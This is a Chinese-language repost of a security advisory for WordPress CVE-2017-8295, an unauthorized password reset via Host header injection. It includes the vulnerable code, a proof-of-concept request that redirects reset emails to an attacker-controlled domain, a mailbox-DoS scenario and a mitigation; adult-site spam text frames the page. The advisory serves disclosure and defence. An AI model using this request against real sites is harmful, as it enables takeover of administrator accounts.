成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

WordPress曝未經(jīng)授權(quán)的密碼重置漏洞(CVE-2017-8295 )

安全 漏洞
WordPress的重置密碼功能存在漏洞,在某些情況下不需要使用之前的身份令牌驗證獲取密碼重置鏈接。
  • 漏洞提交者:Dawid Golunski
  • 漏洞編號:CVE-2017-8295
  • 發(fā)布日期:2017-05-03
  • 修訂版本:1.0
  • 漏洞危害:中/高

[[190461]]

一、漏洞

WordPress內(nèi)核<= 4.7.4存在未經(jīng)授權(quán)的密碼重置(0day)

二、背景

WordPress是一個以PHP和MySQL為平臺的自由開源的博客軟件和內(nèi)容管理系統(tǒng)。截止2017年2月,Alexa排名前1000萬的站點中約有27.5%使用該管理系統(tǒng)。據(jù)報道有超過6000萬站點使用WordPress進行站點管理或者作為博客系統(tǒng)。

三、介紹

WordPress的重置密碼功能存在漏洞,在某些情況下不需要使用之前的身份令牌驗證獲取密碼重置鏈接。

該攻擊可導致攻擊者在未經(jīng)授權(quán)的情況下獲取用戶Wordpress后臺管理權(quán)限。

四、描述

該漏洞源于WordPress默認使用不可信的數(shù)據(jù)。當生成一個密碼重置郵件時應當是僅發(fā)送給與帳戶相關(guān)聯(lián)的電子郵件。

從下面的代碼片段可以看出,在調(diào)用PHP mail()函數(shù)前創(chuàng)建了一個From email頭

  1. ------[ wp-includes/pluggable.php ]------ 
  2.  
  3. ... 
  4.  
  5. if ( !isset( $from_email ) ) { 
  6.         // Get the site domain and get rid of www. 
  7.         $sitename = strtolower( $_SERVER['SERVER_NAME'] ); 
  8.         if ( substr( $sitename, 0, 4 ) == 'www.' ) { 
  9.                 $sitename = substr( $sitename, 4 ); 
  10.         } 
  11.  
  12.         $from_email = 'wordpress@' . $sitename; 
  13.  
  14. ... 
  15.  
  16. ----------------------------------------- 

正如我們所看到的,Wordpress為了生成重置郵件創(chuàng)建的一個From/Return-Path(發(fā)件人/收件人)頭,使用SERVER_NAME變量以獲取服務器的主機名。

然而,諸如Apache的主流web服務器默認使用由客戶端提供的主機名來設(shè)置SERVER_NAME變量(參考Apache文檔)

由于SERVER_NAME可以進行修改,攻擊者可以任意設(shè)置該值,例如attackers-mxserver.com

這將導致Wordpress的$from_email變?yōu)閣ordpress@attackers-mxserver.com,最終導致包含F(xiàn)rom/Return-Path(發(fā)件人/收件人)設(shè)置的密碼重置郵件發(fā)送到了該惡意郵件地址。

至于攻擊者可以修改哪那一封電子郵件的頭信息,這取決于服務器環(huán)境(參考PHP文檔)

基于郵件服務器的配置,可能導致被修改過郵件頭的惡意收件人/發(fā)件人地址的電子郵件發(fā)送給WordPress用戶。

這使得攻擊者能夠在不需要進行交互就可以截取本該是需要進行交互才能進行的操作的密碼重置郵件。

攻擊場景:

如果攻擊者知道用戶的電子郵件地址。為了讓密碼重置郵件被服務器拒收,或者無法到達目標地址。他們可以先對用戶的電子郵件帳戶進行DoS攻擊(通過發(fā)送多個超過用戶磁盤配額的大文件郵件或攻擊該DNS服務器)

某些自動回復可能會附加有郵件發(fā)送副本

發(fā)送多封密碼重置郵件給用戶,迫使用戶對這些沒完沒了的密碼重置郵件進行回復,回復中就包含的密碼鏈接會發(fā)送給攻擊者。

五、POC

如果攻擊者將類似下面的請求發(fā)送到默認可通過IP地址訪問的Wordpress安裝頁面(IP-based vhost):

  1. -----[ HTTP Request ]---- 
  2.  
  3. POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 
  4. Host: injected-attackers-mxserver.com 
  5. Content-Type: application/x-www-form-urlencoded 
  6. Content-Length: 56 
  7.  
  8. user_login=admin&redirect_to=&wp-submit=Get+New+Password 
  9.  
  10. ------------------------ 

WordPress將觸發(fā)管理員賬戶的密碼重置功能

由于修改了主機頭,SERVER_NAME變量將被設(shè)置為攻擊者所選擇的主機名,因此Wordpress會將以下電子郵件頭信息和正文傳遞給/usr/bin/sendmail

  1. ------[ resulting e-mail ]----- 
  2.  
  3. Subject: [CompanyX WP] Password Reset 
  4. Return-Path: <wordpress@attackers-mxserver.com> 
  5. From: WordPress <wordpress@attackers-mxserver.com> 
  6. Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> 
  7. X-Priority: 3 
  8. MIME-Version: 1.0 
  9. Content-Type: text/plain; charset=UTF-8 
  10. Content-Transfer-Encoding: 8bit 

有人請求將以下賬戶的密碼進行重置:

  1. http://companyX-wp/wp/wordpress/ 
  2. Username: admin 

如果是弄錯了,直接忽略該郵件就好。重置密碼請訪問以下地址:

  1. http://companyx-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin%3E 

正如我們看到的,Return-Path, From, 以及Message-ID字段都是攻擊者控制的域

通過bash腳本替換/usr/sbin/sendmail以執(zhí)行頭的驗證:

  1. #!/bin/bash 
  2. cat > /tmp/outgoing-email 

六、業(yè)務影響

在利用成功的基礎(chǔ)上,攻擊者可重置用戶密碼并且未經(jīng)授權(quán)獲取WordPress賬戶訪問權(quán)限。

七、系統(tǒng)影響

WordPress至最新版本4.7.4全部受影響

八、解決方案

目前沒有官方解決方案可用。作為臨時解決方案,用戶可以啟用UseCanonicalName執(zhí)行SERVER_NAME靜態(tài)值(參考Apache)

九、參考文獻

  • https://legalhackers.com
  • https://ExploitBox.io
  • Vendor site:
  • https://wordpress.org
  • http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
  • http://php.net/manual/en/function.mail.php
  • https://tools.ietf.org/html/rfc5321
責任編輯:趙寧寧 來源: FreeBuf
相關(guān)推薦

2017-12-07 09:01:40

2023-12-08 13:18:27

2019-10-24 10:14:30

2013-12-26 13:35:39

2015-03-13 19:22:03

2017-02-17 08:14:27

2023-04-04 22:20:53

2023-07-29 11:15:47

2017-06-12 15:50:16

2017-09-21 09:22:16

gitssh漏洞

2013-11-26 09:45:36

2017-05-25 22:20:05

2015-03-13 09:20:57

2020-10-23 11:13:39

漏洞網(wǎng)絡安全網(wǎng)絡攻擊

2019-07-17 16:03:16

AndroidAPP漏洞

2025-03-06 16:38:19

2017-05-27 10:22:37

2023-05-08 19:28:11

2015-05-08 12:17:53

2015-03-26 12:14:02

iOS漏洞蘋果手機手機安全
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 久久亚洲免费 | av一区在线观看 | 欧美精品片 | 国产精品不卡一区 | 国产在线一区二区 | 日韩精品久久久久 | 欧美mv日韩mv国产网站91进入 | 日韩中文在线视频 | 成人在线a | 一级黄色裸片 | 国产一区二区精品在线观看 | 欧美精品一区二区三区在线 | 欧美在线观看一区 | 久久久久一区二区三区四区 | 中文字幕亚洲视频 | 激情在线视频网站 | 欧美一级大片 | 国产高清一区二区 | 久久久久国产 | 中文一区二区视频 | 久色 | av天天干 | 国产在线精品免费 | 国产精品久久av | 欧美激情精品久久久久久 | 电影午夜精品一区二区三区 | 黄色网址在线免费播放 | 国产欧美一区二区三区久久手机版 | 欧美中文一区 | 国产精品国产 | 国产成人99久久亚洲综合精品 | 成人午夜激情 | 久久精品亚洲国产奇米99 | 久久中文字幕在线 | 美女国内精品自产拍在线播放 | 一区二区三区四区电影视频在线观看 | 精品视频在线免费观看 | 成人精品久久 | 久久精品国产99国产精品 | 福利网站在线观看 | 成人二区 |